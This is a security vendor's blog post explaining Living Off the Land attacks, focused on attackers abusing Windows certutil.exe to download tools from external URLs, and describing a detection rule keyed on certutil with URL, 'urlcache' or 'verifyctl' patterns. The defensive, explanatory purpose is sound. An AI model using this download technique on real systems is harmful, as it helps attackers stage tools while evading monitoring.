The “Security Spotlight” blog series provides insight into emerging cyberthreats and shares tips for how you can leverage LogRhythm’s security tools, services, and out-of-the-box content to defend against attacks.
In this Security Spotlight, we’ll be talking about LOLBAS and highlighting one example of attackers using this technique to accelerate time to breach (MITRE ATT&CK® Technique T1105).
What Is LOLBAS?
Living Off the Land Binaries and Scripts (LOLBAS) is a common method of attack employed by malicious actors. Its basic principle involves utilizing tools already present within a standard operating system, either natively or having been installed from trusted sources, to serve as the primary vectors to launch an attack.
Attackers often adopt this approach after an initial exploitation to gain a foothold within the environment before introducing tooling from the outside to execute even more malicious activities. Commonly employed executables that can be used to do this include cmd.exe, explorer.exe, and msconfig.exe.
Notably, the LOLBAS project aspires to compile a comprehensive list of every binary, script, and library that can be harnessed for Living Off the Land techniques and map them to the MITRE ATT&CK® framework, making it a truly valuable resource!
How Attackers Use LOLBAS To Accelerate Time To Breach
The example we’ll be using involves certutil.exe, a native Windows component and a part of Certificate Services. This service operates by receiving requests for new digital certificates over transports like RPC or HTTP, then checking these requests, setting certificate properties, and finally, issuing the certificate.
However, in our scenario, rather than assisting in this process flow, an attacker hijacks the certutil.exe process to download files from a specified URL. This enables the attacker to transfer their tools or other files from an external system directly into the compromised environment. To make matters worse, they can do this without triggering alerts from monitoring technologies since the process being used is native to the platform. This allows attackers to hide in plain sight.
This phenomenon certainly isn’t new. In fact, the term Living Off the Land was first introduced by Christopher Campbell and Matt Graeber during DerbyCon 3 nearly a decade ago.
A recent instance of this certutil.exe misuse, confirmed by MITRE ATT&CK®, can be seen in part of an attack write-up by Trend Micro. This attack concerned the DRBControl cyber espionage campaign targeting gambling companies running throughout 2020 and 2021. Similar cases regarding certutil.exe misuse date back to 2017, though other process misuse cases likely heavily predate that.
How Can LogRhythm Help You?
The log observed rule crafted by the Analytic Co-Pilot team essentially detects instances where the certutil.exe process is being used in conjunction with a URL defined by a regular expression (regex). When identified, it indicates communication with an external URL resource, which may signal a potential problem.
However, there are cases in which URL connections are established by the process for legitimate purposes. Hence, to refine this rule to mitigate false positives, you could update the regex pattern to include the terms “urlcache” or “verifyctl”. These commands signify an attempt to download payloads from the stated URL, helping to distinguish potentially malicious activities.
Finally, as with most Windows rules, this rule is triggered more easily when Sysmon logging is enabled.
For more information on how to enable these rules within your LogRhythm deployment, check out our community page to read more, download, and then import the rule into your platform.
For other Security Spotlight episodes, you can access the full playlist here.